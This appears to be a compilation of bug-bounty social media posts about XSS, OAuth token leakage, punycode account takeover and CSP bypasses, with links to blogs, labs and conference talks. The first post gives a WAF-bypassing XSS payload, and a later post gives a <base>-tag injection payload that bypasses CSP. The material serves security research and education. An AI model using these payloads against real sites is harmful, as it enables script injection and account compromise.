This was the XSS payload that I used to bypass Akamai WAF: ' oncontent\visibilityautostatechange='a=alert,(a?a:a)(origin)' x=\v+styl\u0065='content-visibility:auto #bugbountytips #bugbounty #lil_tips Let me explain why it's working👇

When you use "Tagged Templates" (e.g, alert`123`), JavaScript passes something like this to the function: alert(["123"]) NOTE: Since alert uses "toString" on the given parameter, it becomes ["123"].toString() and then "123".

I had a similar experience today! 2 hours of narrow recon led me to a JS redirect but CSP stopped the XSS. see this:

first time participating in NahamCon. I’ll cover a practical attack scenario I've made $50K with. Hope everything goes well for me

just wrote a blog post based on this technique and described the methodology to take advantage of it, the post also includes an easy-to-set-up testbed to practice with, hope you find it useful blog.voorivex.team/leaking-oauth-…

We’ve created a lab to demonstrate how an OAuth token can be leaked using a referrer policy override. Check out the article and try the lab here github.com/VoorivexTeam/w…

Is this app vulnerable to XSS?

YS and I created two postMessage challenges based on real-world cases, it's commonly used by developers to secure postMessages this is the first one, can you exploit it?

What do you get when you mix punycode and 0-click account takeover? A talk you absolutely don’t want to miss. @yshahinzadeh & @amirmsafari are teaming up at #NahamCon2025 to walk you through a wild exploit chain 🔥 🗓️ May 23 📍 nahamcon.com

How did we (AmirMohammad Safari) earn $50k using the Punycode technique? I’ve published a detailed blog post about our recent talk, we included 3 attack scenarios, one of which poses a high risk of account takeover on any "Login with GitLab" implementation blog.voorivex.team/puny-code-0-cl…

My new research Escalation of Self-XSS to XSS using modern browser capabilities. blog.slonser.info/posts/make-sel…

this one is going to be paid $10k, public program. I think I should drop a blog post on it because it had a tricky WAF bypass. But for a quick note: I used the <base> tag to bypass the CSP, Payload: param1=+href=https://attsite%20%22&param2=href%22%3E%3Cbase%20

After my first year of full-time bug hunting, I successfully completed Justin’s Challenge on HackerOne . I want to share a few things that might help beginners. The bugs I’ve earned the most from are IDOR and XSS — they’re great to focus on when you're getting started. One

after many unlucky moments in bug bounty, july was fun with interesting findings, I made around $30k bounty, mostly from XSS and OAuth in august, I've planned to dive deeper into client-side stuff